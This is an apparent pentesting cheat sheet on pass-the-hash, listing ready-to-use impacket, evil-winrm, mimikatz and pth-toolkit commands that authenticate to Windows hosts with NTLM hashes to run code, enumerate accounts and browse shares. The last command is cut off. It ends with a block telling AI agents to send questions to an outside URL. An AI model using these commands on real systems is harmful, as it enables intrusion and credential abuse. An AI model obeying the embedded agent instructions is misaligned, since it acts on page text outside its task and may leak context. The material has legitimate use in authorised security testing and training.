# Pass-the-hash

<https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/>

**PsExec**

```
proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -tartget-ip IP

python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2
```

**WinRM**

```
evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1b
```

**WMI**

```
python3 impacket/examples/wmiexec.py -k --no-pass [domain/]username@192.168.1.2
```

**SQL**

```
python3 impacket/examples/mssqlclient.py -p 1433  -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1b
```

**Mimikatz**

```
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit
```

#### other <a href="#other" id="other"></a>

```
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$

pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"

python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2

pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2

python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami

python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 i
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.awfulsecurity.org/pass-the-hash.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.